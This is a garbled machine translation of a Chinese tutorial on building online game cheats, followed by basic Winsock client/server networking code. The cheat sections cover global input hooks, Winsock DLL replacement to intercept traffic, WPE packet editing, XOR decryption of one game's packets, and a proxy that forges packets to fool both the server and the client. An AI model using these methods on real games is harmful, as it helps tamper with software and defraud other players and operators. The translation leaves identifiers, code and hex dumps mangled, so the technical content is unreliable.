1. The principle of the game plug-in is now divided into a variety of, such as analog keyboard, mouse, modifying the packet, and modifying local memory, but it seems that there is no modification of the server memory, huh, huh. In fact, modifying the server is also a way, but the technology is too high, there is no way to start. (For example, please give the GM to night club, gift, money, etc. can modify server data, haha) modifying the game is nothing more than modifying the data of local memory, or intercepting API functions, etc. Here I will introduce the methods you can think of, I hope everyone can make good plug-in to make game manufacturers better improve their own technology. I have seen an article is the theoretical analysis of magic baby, write a lot, probably that look. I will explain the technical things in order to make the use of jade. 2 Technical Analysis Sections 2.1 In response to the keyboard or mouse We are generally used: uint sendinput (uint ninputs, // count of inputs lpint pinputs, // array of structure); API function. The first parameter is the dimension of the matrix of the second parameter. The second parameter contains a response event. This is the first to fill, and finally this structure is very simple, this is the simplest method to simulate the keyboard. Mouse, huh, huh. Note that this function has an alternative function: void keybd_event (byte BVK, // Virtual key code BYTE BSCAN, / / scanning code DWORD DWFLAGS, ULONG_PTR DWEXTRAINFO // Additional key status); with void mouse_event (dword dwflags, //motion And Click Options DWORD DX, // Horizontal Position Or Change Dword Dy, // Vertical Position Or Change Dword Dwdata, // Wheel Movement Ulong_ptr DWEXTRAINFO // Application-Defined Information; these two functions are very simple, I think the buttons The elf is this. The above is an analog keyboard, the following is an analog mouse. This is just an analog part, you have to contact the game we need to find the game's window, or contain shortcuts, just like the activation key of the button, we can use the getWindow function to enumerate the window, or use FindWindow Function to find a developed window (note, there is a findwindowex), FindWindowEx can find the child window of the window, such as buttons, what to wait. When the game switches the scene, we can use FindWindowEx to determine some of the characteristics of the current window, thus judge whether it is still in this scenario, such as getwindowInfo to determine something, such as when you find a button, you will explain The game scene has been switched, and so on. Some games have no controls inside, which is to change the image to the image, this method is limited. This requires us to use other ways to assist in analyzing. As for the shortcut, we have to be implemented with a dynamic connection library, and it is also very simple to use the Hook technology.
Everyone maybe, it is actually a global HOOK object and then setwindowhook is OK, and the callback function is ready, and now the online example is more like a humm. This implementation is already very common in plug-in. If anyone else doesn't understand, let's take a look at MSDN Find SetWindowHook. Don't underestimate the role of this dynamic connection library, it can be cut into all process space, that is, you can load it into all games, as long as you use it, you will find it very use. This requires you to review the basics of Win32 programming. Oh, hurry to read the book. 2.2 Intercept messages Some game response mechanisms are relatively simple, based on messages, or what timer is used. At this time you can use intercept messages to implement some interesting features. We intercept messaging is also hook technology, including keyboard messages, mouse messages, system messages, logs, etc., other things have nothing to do, we only use the callback function of intercepting messages, this will not let I wrote an example. In fact, this is the same as the above, it is written in SETWINDOWHOOK, and you will understand very simple. As for what to intercept, you are your business, such as handling some of our data judgment in each timer message, or in the timer to simulate a timer, then some data will handle twice, huh, huh. The consequences, not necessarily a good thing, huh, huh, but if the data calculation is placed on the client, you can really change the data, huh, try it. There are still a lot of use, you can think of it, huh, huh. 2.3 Intercepting the Socket package This technology is much difficult than the original. First we have to replace WINSOCK.DLL or WINSOCK32.DLL, we write the replacement function to be consistent with the original function, that is, what is its function output, and we also have to output what is like a function, but also parameters, parameter sequence All must be just the same, then call the function in the true Winsock32.dll in our function. First of all: We can replace dynamic libraries to system paths. Second: When our application starts, the original dynamic library can be loaded, and then use this function loadLibary and locate the entry to get the entry address of each real socket function with the getProcAddress function. When the game is going, it will call our dynamic library, then jump to the true dynamic library after processing from our dynamic library, so we can handle your own data in it, it should be all data . Oh, excitement, intercept the packet, we have to analyze the correct response, don't think that this work is completed, it is early. After the analysis is completed, we also want to simulate the answer mechanism to communicate with the server, one accidental will be sealed. The analysis data is the source of workload. The game will have a change in the way. Therefore, we should write out the people who are desperate, and they are fooled. 2.4 Intercepting the technology above the API If we can use it flexibly, we don't have to intercept the API function, in fact, this technology is a supplementary technology. For example, we need to intercept socket as our use, we must use this technology, in fact, we can also use it directly to directly intercept the function in the socket, which is more direct. Now that the tutorial of the API is everywhere, I don't list, the method of the comparative habits I use is to intercept according to the input festival, this method can be used on any operating system, such as windows 98/2000, etc. The method is not cross-platform, I don't recommend it.
This technology can learn from the contents of the 545 pages of "Windows Core Programming", if the Win98 system can use the last chapter of the "Windows System Mystery" to learn. Online game plug-in preparation 1 If you want to make a hundred battles in the modification of the game, it is necessary to have a considerable computer knowledge. There are many computer masters to play games, modify the game, and gradually produce a strong interest in the computer, gradually grow up. Don't envy others can do it, because others can do it! I believe that after reading this tutorial, there will be a new understanding of the game, huh, because I am a good teacher! (Don't take the egg, hurt! # ¥% ... *) But want to learn knowledge from the modification of the game, increase your computer level, can not just modify the game! To know, modifying the game is just a place to verify that some computer knowledge you know, you can only give you some discovery questions, solve the opportunity to solve the problem, can only help you improve your interest in learning computers And it is not a way to learn the shortcut. One: What is hanging? Nowadays, online games are based on Internet access client / server mode. The server program runs on the game server. The game designer creates a huge game space, and players from all over the game can be logged in to the game by running client programs. . Simply put, online games actually provide a game environment by game developers, while players are relative free and openly in this environment. So since there is a server in the online game, we used to modify the game method for power. Remember that we have changed the various properties of the role in a single-machine version of the game, which is invited by memory search, which is not used in the online game. Because the various properties and various important information we played in online games are stored on the server, on our own machine (client) just displays the status of the role, so through the modification of the role in the client memory The species is unrealistic. So, don't we do any way to reach our modification in online games? The answer is "No". We know communication of Internet Customer / Server Mode Generally adopted TCP / IP communication protocols. Data exchange is implemented through the transmission of IP packets. Generally, our clients send certain requests to the server, such as mobile, combat and other instructions. It is switched through the form of the package and the server. Then we call the local news called Send, meaning to send data, after the server receives our Send, feedback the relevant information to the client, such as moving coordinates, and the type of battle. Then we collect the information sent by the client from the server called Recv. I know this truth, the work we have to do is to analyze the data between the client and the server (that is, the package) so that we can extract the data to us, and then simulate the server to the client. Or the simulated client is sent to the server so that we can implement the purpose of our modification. In addition to modifying the game packages to achieve the purpose of modifying the game, we can also modify the client's related procedures to meet our requirements. We know that the calculation capacity of each server is limited, especially in the game, the game server wants to calculate all the players in the game, so there are some operations to rely on our clients to complete, this is given We modify the game to provide some convenience. For example, we can detect the client program to find some programs to discover the branch. We can remove some of our unfavorable judgments to meet the needs of us to modify the game.
In the next few chapters, we will tell you the concept of the package, and modify the relevant knowledge of the client. Are you ready? Game data format and storage: Before conducting our work, we need to master some knowledge of the storage data in your computer and the characteristics of storage data in the game. This chapter is to provide a player who is provided to the rookie. If you are a master, you can skip. If you want to be an invincible swordsman, then you will spend some time; if, you just want to make a If the tourists of the rivers and lakes, then these things understand whether there is nothing to do. Is it a sword, or a tourist, you choose! Now we start! First, you have to know several formats in the game, these formats are: bytes, words (word), double words, or 8 bits, 16-bit, and 32-bit storage. the way. The byte is also a number of 0 to 255. The word or the 16-bit storage mode can store the number of 0 ~ 65535; the double word is 32-bit way to store 0 ~ 4294967295. Why do you want to understand this knowledge? The maximum value of various parameters in the game is different, and some may be enough 100 or so, for example, the level of the role in Jin Yong Qun Xia Chuan, the number of enemies, etc. Some of them need more than 255 or even greater than 65535, and the money value of the role in Jin Yong Qun Xia can reach millions. Therefore, the type of different data in the game is different. When we modify the game, you need to find a package that is prepared to modify, in which case the type of data correctly determines is an important condition for quickly finding the correct address. In the computer, data is based on bytes, each byte being given a number to determine the position of each. This number should be called address. When you need to use a word or double word, the computer makes a word with a continuous two bytes, and two consecutive words form a double word. And the address of a word or double word is the address of their low byte. Now that our usual Windows 9x operating system is represented by a 32-bit binary number. When we usually use the memory address, it always uses an 8-bit 16-based number to represent it. What is the binary and hexadecimal? Simply put, the number of binary is only 0 and 1 two digital, and each of the counting carrying encompacters. Similarly, the 16 credit is a count carrying method for every sixteen. 16 Entering 0 - f sixteen numbers, which uses the numbers of Ten to 15 using the numbers of A, B, C, D, E, F, and the correspondence between them and the decade is: a corresponds to 10, B correspond to 11, C correspond to 12, D correspond to 13, E correspond to 14, F corresponds to 15. Moreover, there is a simple correspondence between the 16-based number and the binary number, that is, the four-bit binary number is equivalent to a number of 16-based number. For example, a four-bit binary number 1111 is equivalent to 16-based f, 1010 is equivalent to A. Understanding these basic knowledge has a great help to modify the game, let's talk about this problem. Since the data is stored in the computer, the conversion relationship between the binary and the binary is very simple, so most modification tools displays 16-en-generated code when the data in the computer is displayed. You also need to enter 16-based numbers when you modify. Are you clear? The data seen in the game can be decimal. When you want to find and modify the value of the parameter, you can use the calculator provided by Windows to perform decimal and 16-based translation, we can be in the program group in the start menu. Find it in the attachment. The knowledge you have to know now is almost the same! However, there is a problem to pay attention to in the game modification.
The storage method of data in the computer is typically stored in the low byte, and the high number is stored in the high byte. For example, the decimal number 41715 is converted to a 16-based number A2F3, but this number is stored as F3A2 in the computer. Have you seen the above content? Ok, let's tell everyone how you are in the game, come! Everyone rolls the sleeves and let us work! Second: What is a package? How to cut a package package? How to check the IP address and port number of the game server? Internet users use various information services, the information of its communication can ultimately be attributed to information transfer in units of IP, and the IP package includes information to be sent to the destination IP address, in addition to the data information to be transmitted. The source IP address sent by the information, as well as some related control information. When a router receives an IP packet, it will find the routing table according to the destination IP address item in the packet, and send this IP packet to the corresponding port based on the results of the lookup. The next IP router will continue to forward after receiving this packet until it is sent to the destination. Routers can be exchanged for routing information between routing protocols, thereby updating the routing table. Then we care about data information in the IP package, we can use many listening networks to intercept the exchange data between the client and the server, and you will introduce one of the tools: WPE. WPE Usage: Execute WPE There will be the following features to choose: Select Game Select the program you want to intercept in your memory, you only need to double-click the program name. Trace tracking function. Used to track packets sent by the capture. WPE must first complete the program name of the program to track, you can use this item. Press the PLAY key to open the package. You can press at any time | | Pause Track, please press again | |. Pressing the square to stop capturing packets and display all captured packages. If you do not press the square stop button, the tracking action will automatically stop according to the set value in the option. If you don't pick it up, try to adjust the Option to Winsock Version 2. WPE and Trainers are set to display at least 16 bits colors. Filter filtering function. It is used to analyze the packet captured and modified. Send Packet Sends a packet feature. Ability to give you a false package. Trainer Maker makes a modifier. Options setting function. Let you adjust some of WPE's setpoint. Filter's detailed teaching - When Filter is started, the button button will present red. - When you start Filter, you can close this window at any time. Filter will remain in the original state until you press the ON / OFF button again. - Only the Filter Enable button is in the state of OFF to check the box before the Filter is selected to edit the modification. - When you want to edit a Filter, just double click on the name of the file.
Normal Mode: Sample: When you are in the Striew Fighter Online ﹝ 打 打 风 上 版? # 123; In the game, you have used a fireball and hit the other party. At this time, you will take the following package: Send- > 0000 08 14 21 06 01 04 Send-> 0000 02 09 87 00 67 FF A4 AA 11 22 00 00 00 SEND-> 0000 03 84 11 09 11 09 Send-> 0000 0A 09 C1 10 00 00 FF 52 44 Send -> 0000 0A 09 C1 10 00 00 00 66 52 44 Your first fireball makes the other party reduce 16 drops 16 = 10h? # 123; the health of the 4th, and you observe the 4th and 5th packets 4 There is a value of 10h, it should be here. You observed that 0A 09 C1 before 10h did not change in both packets, and it was obvious that these three values were the key to playing a fireball. Therefore, you will fall 0A 09 C1 10 in the search column Search? # 123; and then fill in the FF in the position 4 of the modified column ﹝ modify? # 123; As a result, when you send a fireball again, FF will replace the previous 10, which is a fireball of 255! Advanced Mode: Sample: When you are in a game, you don't want to use the real name, you want to transfer to each other with a modified fake name. After you use Trace, you will find some of your names in some packages. Suppose your name is Shadow, converted into a 16-in-one is ﹝ 53 68 61 64 6f 77? # 123 ;; And you plan to use Moon ﹝ 6d 6f 6f 6e 20 20? # 123; to replace him. 1) Send-> 0000 08 14 21 06 01 042) Send-> 0000 01 06 99 53 68 61 64 6F 77 00 01 05 3) Send-> 0000 03 84 11 09 11 094) Send-> 0000 0A 09 C1 10 00 53 68 61 64 6F 77 00 11 5) Send-> 0000 0A 09 C1 10 00 00 00 00 52 44 But you look carefully, your name is not in the same location in each package - in the second In the package, the name appears in the 4th location - in the 4th packet, the name appears in the 6th position, you need to use Advanced Mode - you are searching some ZSearch? # 123 Fill in: 53 68 61 64 6f 77 ﹝ Be sure to fill in the position 1 # 123; - You want to replace the new name from the original name Shadow, so you have to choose from the value discovered from the value. Start replacement continuous value ﹝ from the position of the chain found? # 123; - Now, in the position of the modification column ﹝ modify? # 123; 000, the 6D 6F 6F 6E 20 20 is now the corresponding position, that is, from the original search column 001 position starts to change? # 123; You want to modify the value from the first location of the package, please select ﹝ from the beginning of the packet? # 123; People who know that TCP / IP protocol common sense know that the Internet is transferred after the information data is packaged. Each packet is divided into two parts: header information and data information. The header information includes the transmission address of the packet and the arrival address, and the like. Data information includes all information we are related to the operations in the game.
Then we must know various information such as the IP address and port number of the game server before doing the process of seating the package. In fact, it is the easiest to see if there is a Server.ini configuration file. You can view the IP address of a game server. For example, Jin Yong Qun Xia Chuan is the case, then in addition to this, we can use netstat in DOS, the network connection, routing table, and network interface information, You can let users know which network connections are working. Or you can use tools such as Trojan to view the network connection. Tools are very much, see which one you like. The general format of the netstat command is: The meaning of each option in the NetStat [Options] command is as follows: -a Displays all sockets, including listening. -c is redisplayed every 1 second until the user interrupts it. -i Displays information about all network interfaces. -n replaces the name in the network IP address, showing the network connection situation. -r Displays the core route table, formats with "route -e". -t shows the connection of the TCP protocol. -u Displays the connection of the UDP protocol. -v displays working in progress. Online game plug-in writing basics 2: How to analyze our intercepted packet? First we save WPE intercepted packets as text files, then open it, then see the following data (here we use the data sent by the PK shop in Jin Yong Qun Xia to explain as an example): The first file : Send-> 0000 e6 56 0D 22 7e 6b E4 17 13 12 13 12 13 67 1Bsend-> 0010 17 12 DD 34 12 12 12 12 17 12 12 12 12 12 9Bsend-> 0000 E6 56 1e F1 29 06 17 12 3B 0e 17 1ASend-> 0000 E6 56 1B C0 68 12 12 12 5ASend-> 0000 E6 56 02 C8 13 C9 7E 6B E4 17 10 35 27 13 12 12send-> 0000 E6 56 17 C9 12 Second File: Send- > 0000 83 33 68 47 1B 0e 81 72 76 77 77 77 77 77 77 07 1C 77 77 77 77 72 77 72 77 77 77 6Dsend-> 0000 83 33 7B 94 4C 63 72 77 5E 6B 72 F3send-> 0000 83 33 7e A5 21 77 77 77 3fsend-> 0000 83 33 67 AD 76 CF 1B 0e 81 72 75 50 42 76 77 77send-> 0000 83 33 72 AC 77 We found that two PK shop small two data formats However, the content is not the same, we are the same NPC of PK, why will it be different? The package of Jin Yong Qun Xia Chuan is transmitted on the Internet. Then we face the problem to decrypt the secret text to make a clear text. Because the general packet encryption is different or the operation, this will talk about what is different or.
Simply put, the same is "the same is 0, and it is 1" (this is for binary bitwise), and an example, 0001 and 0010 are different or, our bit by bit, the difference is 0011, The calculated method is that the fourth bit of the 4th bit of 0001 is 0, which is the same, and the 4th place of the different or the result is "the same as 0, different 1", the first 0,0001 The third bit of 3 bits of 0,0010 is 0, the third bit of the different or the result is 1 of 0,0001, the second bit of 0,0010 is 1, then the second place of the different or the result is 1 The first bit of 1,0010 of 0001 is 0, then the first bit of the different or the result is 1, and the combination is 0011. The different or the operation will encounter a lot in the future, everyone can be familiar with familiarity, skilled in the analysis. Below we continue to look at the above two files, according to the common sense, the data of the packet is not all value, the game development will reserve some byte space to facilitate the future expansion, that is, the packet will exist. Some "00" bytes, observe the above documents, we will find a lot of "12" in the document, and there are many "77" in the file, then this is the "00" of us? We start to act! We divide the documents with "12" different or the document two and "77" are different or, of course, use the hand to work very much, we use the "M2M 1.0 Encrypted Packet Analysis Tool" to be more convenient. The following results were obtained: The first file: 1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09SEND-> 0010 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 892 SEND -> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 083 Send-> 0000 F4 44 09 D2 7A 00 00 00 00 484 Send-> 0000 F4 44 10 da 01 DB 6C 79 F6 05 02 27 35 01 005 Send- > 0000 F4 44 05 DB 00 second file: 1 SEND-> 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09SEND-> 0010 05 00 70 6B 00 00 00 00 05 00 05 00 00 00 1A2 sent-> 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 843 Send-> 0000 F4 44 09 D2 56 00 00 00 484 Send-> 0000 F4 44 10 da 01 B8 6C 79 F6 05 02 27 35 01 00 005 Send-> 0000 F4 44 05 db 00, this top of the two files are the same, indicating that our reasoning is correct, the above is the plain text we need! Next is to understand the meaning representing some key bytes, which requires a large number of data to analyze. First we will find that each packet begins with "F4 44", and the third byte is changing, but the change is very regular.
Let's take a look at the length of each package. I found out? Yes, the third byte is the length of the package! By intercepting a large number of data packets, we judge the 4th byte representative instruction, that is, what is the operation of the client tells the server. For example, to the server requesting the battle command is "30", the movement command is "D4" in the battle. Next, we need to analyze the first package above "F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09 05 00 CF 26 00 00 00 05 00 1C 00 00 00 89", in this package What information is included? Which NPC you should notify the server, let's find what the code is looking for this store. We re-PK a little Luo Luo (that is, the one outside the Dali Inn): send-> 0000 F4 44 1F 30 D4 75 F6 05 01 01 00 01 00 01 75 09send-> 0010 05 00 8A 19 00 00 00 11 00 02 00 00 00 C0 We are analyzed according to the common sense, although the NPC species in the game will not exceed 65535 (FFFF), but will not limit the scope of the word when developing, so it is not conducive to the expansion of the game, so we are in double words Look. By comparing the two packages of "small two" and "small Luo Luo", we put the goal in "6C 79 F6 05" and "CF 26 00 00". (It is easy to compare, but you can't be too late, huh, we will look at the back package, in the back bag, there should be an NPC code, such as mobile package, game allowance, server must know NPC mobile coordinates, broadcasting other players to watch the battle. In the back 4th package "Send-> 0000 F4 44 10 da 01 DB 6C 79 F6 05 02 27 35 01 00 00" We also saw "6C 79 F6 05", the code in the initial discord store is it! (This analysis contains a lot of work, you can use WPE cut data from tax analysis) The first package analysis is temporarily here (there are still information, we don't need to clearly ", we look at 4 packs "Send-> 0000 F4 44 10 da 01 DB 6C 79 F6 05 02 27 35 01 00 00", then cut the PK yellow dog's bag, (the dog will come out 2 oh) look at the format: Send- > 0000 F4 44 1A DA 02 0B 4B 7D F6 05 02 27 35 01 00 00send-> 0010 EB 03 F8 05 02 27 36 01 00 00 According to the above analysis, the yellow dog's code is "4b 7d F6 05" (100040011) However, how is the two yellow dog servers distinguished? Look at "EB 03 F8 05" (100140011), it is the last code plus 100,000, huh, so that the server can recognize two yellow dogs. We have confirmed that the packets intercepted by the enemy through the wild. Sure enough.
Then, the format of this package should be more clear: the third byte is the length of the package, "DA" is instruction, the 5th byte is NPC, 10 bytes starting from the 7th byte representative An NPC information, more NPCs, more than 10 bytes. If you play the net gold, you will inevitably know that the randomness sometimes has a reinforcement, and we use the game to reinforce the NPC for each battle. By adding a package in the battle, we will find the server side to send such a package: F4 44 12 E9 EB 03 F8 05 02 00 00 00 00 00 00 00 5 - 8th byte NPC's code (here we are simply illustrated by the yellow dog code). So, we use stand-alone proxy technology to deceive clients and servers at the same time! Ok, the work of calling NPC is a short half, the next thing, how to modify the package and send the package, let's continue explanation next section. Four: How to pretend to "client" to "server" to send us the package we need? Here we need to use a tool, which is between the client and the server side, and its work is to receive and forward the packet, which we call it a proxy. If the agent's work is simple to receive and forward, this is meaningless, but please note: All packets must be transmitted through it, and the meaning here is significant. We can analyze the received packets or forward them directly, or modify forward, or press the packets we need to send. Below we continue how to cheat the server and client at the same time, that is, modify the package and forgery packages. Through our previous analysis, we already know how to play multiple NPC package formats, then we will do it! First we have to find the package sent by the client, find the feature of the battle, is the first package of the request battle, we find "F4 44 1F 30" character, this is not changed, of course, it is necessary to decrypt. After found, it means that the client will ask the server to ask the server, we don't move this package, forward. Continue to find down, then the signature that needs to be found is not good, let's find "Da" first, this is the directive of the client to send NPC information, then there may be "Da", there is no relationship, we look The first three bytes do not have "F4 44". After finding it, our work begins! We determine the NPC number to be hit. This quantity is not very big. The reason is that the package length of the net gold is indicated by a byte. Then a package can have 255 bytes, we have analyzed it, adding an NPC to add 10 bytes, so everyone is counted. It is appropriate to play 20 NPCs. Then we have to calculate the original NPC code analysis of the client, because the added NPC code should add 100000. Calculate our increased NPC code, and combine into a new package, pay attention to the byte representing the length of the package to modify, then forward to the server, this step should pay attention to the algorithm when writing the program, do not cause a large delay. Above we deceive the server ended, the deception of the client is simple.
After sending the above package, we will send it to the client according to the new NPC code construction package. The format is "F4 44 12 E9 NPC code 02 00 00 00 00 00 00 00 00", putting each new NPC Constructing such a package, sequentially send it together to the client in order, the client is also deceived, very simple. In the future, there will be other things in the battle, we will not be able to open it. Online game communication model, first probing 1 preamble online game, as a product with organic combination of games, bringing players into new entertainment. Online games in China have also developed in China, and only 3, 4 years of history, and online games are still very young compared to single-machine games that have already developed history for decades. Of course, its formation is also based on historical changes, and there is no income of the Internet. As a new product, the development of online games is more mysterious about the developers. For an unknown area, developers may need to know what is the difference between online games and ordinary stand-alone games, how to connect the players, and How to provide a player with an interactive entertainment environment. This article will surround these three topics to tell you about the network interconnection method of online games. Online games and stand-alone games, I have to let people think of stand-alone games. In fact, online games are unable to get out of single-machine game, online games and stand-alone games can be very straightforward: not Do you have a multiplayer? That's right, but how to implement these features, how to make a reasonable integration of the network connection to the single game, is what we have to discuss below. Before you understand the specific implementation of the Internet, let's take a look at the individual running processes and online games. Only by knowing this, you can go deep into the core of online game development. Let us first let us look at the simplified execution process of ordinary stand-alone games: initialize () // Initialization module {initialization game data;} Game () // Game cycle part {Draw game scene, character, and other elements; get user operation input ; Switch (User Enter Data) {Case Move: {Handling Characters;} Break; Case Attack: {Process Attack Logistic:} Break; ... other Processing Response; ... default: Break;} Game NPC and other logic Ai processing;} exit () // game end {release game data; leave the game;} Let me explain the flow of the upper alone game. First of all, whether it is a game software or other application software, the initialization part is essential, here you need to initialize the data of the game, including images, sounds, and some necessary data. Next, our game is looped to the scene, characters, and other elements, showing the game world to the player, and receives the player's input operation, and responds according to the operation. In addition, the game needs to NPC and some logic AI. Treatment. Finally, the game data is released, the game is over. There is a significant difference between online games and stand-alone games, which is a server for connecting all users in addition to a user interface platform (such as single game) for operation games, and provides data services for all users, From some point of view, the game server is like a large database, providing data and data logic interaction.
Let's take a look at a simple online game model execution process: client: login () // login module {initialization game data; get user and password entered by the user; create a network connection with the server; send it to the server for user authentication; ... Waiting for the server to confirm the message; ... get the login message for server feedback; if (established) enters the game; ELSE prompts the user to log in to errors and re-accept the user login;} Game () // Game cycle part {Draw game scene, Characters and other elements; get user operation input; send users' operation to the server; ... Waiting for the server's message; ... receive feedback information of the server; Switch (Message Data of Server) {Case Local Player Mobile Message : {IF (allowing local players to move) The client is handled by the client; the ELSE client maintains the original state;} Break; Case other player / NPC mobile messages: {Other players or NPC mobile processing according to the feedback information of the server; } Break; Case new players join the game: {Add this player in the client;} Break; Case player leaves the game: {Destroy this player data in the client;} Break; ... Other message type processing; .. DEFAULT: BREAK;}} EXIT () // Game end {Send leaving message to the server; ... Waiting for the server to confirm; ... get the server confirmation message; disconnect with the server; release the game data;} Server: listen () // Game server waits for the player connection module {... Waiting for the user's login information; ... receive user login information; analyze if the username and password are compliant; if (conformity) {Send acknowledgment Allow access to the game message Give the client; put this player into the game message to all players in the scene; add this player to the server scene;} else {Disconnect the connection with the client;}} Game () // Game server loop section { ... Waiting for the player's operation input in the scene; ... receives a player's mobile input or NPC mobile logic input; // This player / NPC is moving as an example to move whether the map scene is movable Judgment; if if (movable) {Move the player / NPC to the server; send the mobile message to the client; send this player's mobile message to all players on the scene;} ELSE sends unmovable The message gives the client;} exit () // Game service = server end {Receive the player leave message; send this message to all players in the scene; send the information allowed to leave; deposit the player data into the database; log out this player Data in the server;}} Let us explain the operation mechanism of the simple online game model. Let's talk about the server side, here the server is divided into three parts (actually a complete online game far more than this): login module, game module, and logout module. The login module is used to listen to the network connection message sent by the online game client and verify its legitimacy, then create this player in the server and lead the player to the game module; the game module provides the player's actual application service, We will introduce this section in detail; after getting the player wants to leave the game, the logout module will remove the player from the server and save the player's attribute data into the server database, such as: Experience, Level, Life value, etc. Let's take a look at the client of online games. At this time, the client is no longer like a stand-alone game. After initializing the data, you can enter the game directly, but to create a connection with the server, and enter the game before the license is obtained. In addition, the client game process of online games needs to communicate with the server, and the status of the current game is determined by switching data with the server, such as the position of other players, the item drop. Similarly, when leaving the game, the client will inform the server to leave the player user to make the server proceed accordingly.
The above use simple pseudo code to elaborate the execution process of stand-alone games and online games, and everyone should clearly see the differences between the two, and between the two mutual relationships. We can consider it, the online game is to move the logical arithmetic part of the stand-alone game to the game server and then return the processing result (including other player data) to the player to the connected player through the game server. Network interconnection After understanding the basic form of online games, let us enter the real actual application part. First of all, as a online game, in addition to the things necessary for the conventional stand-alone game, we also need to add a network communication module. Of course, this is the main part of the online game, let's discuss how to implement the network communication module. A perfect network communication module involves fairly wide, this article is only discussed for more basic processing methods. Online games are composed of clients and servers, and there are two different network communication processing methods, but we have the same place, we will introduce their common point. We use Microsoft Windows 2000 [2000 Server] as a development platform, and use Winsock as a network interface (probably some friends will consider using DirectPlay to make network communication, but for current online games, DirectPlay is not suitable, specific reasons are not available here Discussed). After determining the platform and the interface, we start some of the necessary initialization work before the network connection creation, whether it is a client or server. Let us look at the following code fragment: WORD wVersionRequested; WSADATAwsaData; wVersionRequested MAKEWORD (1, 1); if (WSAStartup (wVersionRequested, & wsaData) 0!) {Failed (WinSock Version Error "!);} Above by calling the socket Windows of The API function is initialized to initialize the network device, and then the creation of network sockets, the code snippet is as follows: Socket SSocket Socket (AF_INET, M_LPROTOCOL, 0); if (SSOCKET == Invalid_socket) {failed ("Winsocket Create Error!");} Here It should be noted that the number of Socket connections required for the client and the server is different. The client only needs a socket connection to meet the needs of the game, and the server must create a socket connection for communication for each player user. Of course It is not to say that if there is no player on the server, it is not necessary to create a socket connection. The server side generates a special socket when starting, and the player will create a request for the server to respond, and wait for the network listening part. More detailed. Initialization and creation inevitably release and delete, let's take a look at the released section below: if (SSOCKET! = INVALID_SOCKET) {CloseSocket (SSOCKET);} if (wsacleanup ()! = 0) {Warning (Washing "Can't release winsocket");} The two steps here released the initialization of the creation initialization in front.
Next, look at a network execution process of the server side. Here we assume that the server has created a Socket for use, what we have to do is to let this socket turn to monitor the private interface of the network connection request, see the following code segment: SockAddr_in AddR MEMSET (& addr, 0, sizeof (addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl (inaddr_any); addr.sin_port = htons (port); // port is the port number to listen to //// Bind Socketif (Bind (SSocket, (SockAddr *) & addr, sizeof (addr) == SOCKET_ERROR) {Failed ("Winsocket Bind Error!";} // Listening IF (Listen (SSOCKET, SOMAXCONN) == Socket_ERROR) {FAILED ("Winsocket Listen Error!"; Uses blocking communication processing, at which time the program will be in the state of waiting for the player user connection, if there is a client connection in this time, create it through accept (). players user Socket connection, the code fragment below: sockaddraddrServer; int nLen sizeof (addrServer); SOCKET sPlayerSocket accept (sSocket, & addrServer, & nLen); if (sPlayerSocket == INVALID_SOCKET) {Failed (WinSocket Accept Error ";!} here we create SPLAYERSOCKET connection, after which the game server communicates with this player users all through this Socket, so far we have already accepted the function of the player user connection, let us see how the game client is connected to the game server On, the code snippet is as follows: SockAddr_in addr; memory (& addr, 0, sizeof (addr)); addr.sin_family = AF_INET; // To connect the game server port number addr.sin_addr.s_addr = inet_addr (ip); // Connected game server IP Addr (port); // Here, the client and server already have a bridge of communication, // Next is the transmission and reception of data: Connect (SSOCKET, (SockAddr *) & Addr, Sizeof (addr); if (SSOCKET, PBUFFER, LLENGTH, 0) == Socket_ERROR) {failed ("Winsocket Send Error!";} The PBuffer here is the data buffer pointer to be sent, and LLEngth is the data that needs to be sent. Through this Socket API function, we can perform data from the client or server, while we can perform data reception via the RECV () this Socket API function: if (RECV (SSocket, PBuffer, LLENGTH, 0) == Socket_ERROR) {Failed ("Winsocket Recv Error!";
} Where PBuffer is used to store the acquired network data buffer, LLEngth is the length of the data that needs to be acquired. Now, we have already understood the basic knowledge of network interconnects, but as online games, such a simple connection method is unable to meet a hundred people in online games online, we need more reasonable tolerance and stronger network communication processing method Of course, we need to know what the online game needs for network communication. RNING Collection Candout (please do not delete) Network game communication model initial probing 2 everyone knows that the game needs to continue to loop the logic in the game and the game world's drawing, the Winsock handles described above is in a blocking method, so Violation of the implementation of the game, you can imagine, in the process of connecting to the server, your game can't get control, then if the player wants to cancel or do other processing, even showing the most basic dynamic connection tips . So we need to use other ways to handle network communication, so that it will not conflict with the game main line, you may think that you can create a network thread to handle it? That's right, we can create a sub-thread specifically for network communication to solve this problem. Of course, we have a thread in our game. We need to do more considerations, let us see how to create a network communication thread. In the Windows system, we can create threads through the CreateThread () function, see the following code snippet: dword dwthreadId; handle hthread = Createthread (Null, 0, Netthread / * Network Clock Function * /, SSOCKET, 0 , & dwthreadid; if (hthread == null) {Failed ("Winsocket Thread Create Error!" Here we create a thread, simultaneously pass our Socket to thread function: DWORD WINAPINETTHREAD (LPVOID LPARAM) {Socket SSocket Socket) LParam; ... return 0;} Netthread is our future network thread that we will handle network communication. So, how do we introduce Socket processing? Take a look at the code snippet below: Handle HEVENT; HEVENT = CreateEvent (NULL, 0, 0); // Set asynchronous communication IF (WSAEventSelect (SSOCKET, HEVENT, FD_ACCEPT | FD_CONNECT | FD_READ | FD_WRITE | FD_CLOSE) == SOCKET_ERROR) {Failed ("Winsocket Error!";} After the settings, the Winsock API function runs in a non-blocking manner, that is, returns immediately after the function is executed, and the network communication is stored in the incident, not the entire branch.
